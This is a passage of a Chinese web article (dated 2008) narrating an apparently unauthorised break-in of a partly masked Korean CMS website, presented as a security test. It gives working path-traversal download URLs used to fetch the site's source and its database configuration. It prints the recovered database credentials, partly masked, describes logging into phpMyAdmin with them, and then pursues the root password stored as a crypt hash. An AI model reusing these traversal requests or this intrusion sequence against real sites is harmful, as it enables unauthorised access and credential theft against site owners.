对韩国某CMS的一次安全检测
2008-11-18 13:32:37 来源:WEB开发网图14破解Linux系统帐号
10.继续检测web程序漏洞
继续通过下载漏洞获取其它文件,在浏览器中输入构造好的地址:
http://www.b****k.net/ez/bbs.php?table=sub1&action=down&where=dat&dtype=up&uid=133&file=../../../../ez/bbs.php来下载bbs.php文件,将bbs.php文件下载到本地后,通过查看源代码,得到连接数据库的文件为conf/db_info.php,于是构造数据库文件下载地址:
http://www.b****k.net/ez/bbs.php?table=sub1&action=down&where=dat&dtype=up&uid=133&file=../../../../conf/db_info.php下载数据库连接文件,得到连接数据库的用户名和密码:111111111111111111111
$DB[kind] = "mysql";
$DB[host] = "localhost";
$DB[name] = "b*******";
$DB[user] = "banseuk";
$DB[pass] = "se********";
?>
于是登录phpmyadmin(221.***.**.21/mysql)管理数据库,准备查找出网站后台的用户名和密码(有时并不一定能找到phpmyadmin的地址),使用用户名“b*******”以及对应密码“"se********"”进行登录,登录Phpmyadmin后发现,该网站管理员表kimsmall7_gadmin竟然是空的,如图15所示。
CMS的一次安全检测" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer;"/>
图15管理员表为空
或者说这个不是管理员表?于是先下载登录处理文件看看,构造login文件下载地址:
http://www.b****k.net/ez/bbs.php?table=sub1&action=down&where=dat&dtype=up&uid=133&file=../../../../lib/login.php,将其下载到本地,查看一下代码,原来只有ROOT这个用户可以登录,但ROOT用户的密码不在数据库中,而在conf/mkpass.php文件中,而且使用crypt函数加密,如图16所示。
更多精彩
赞助商链接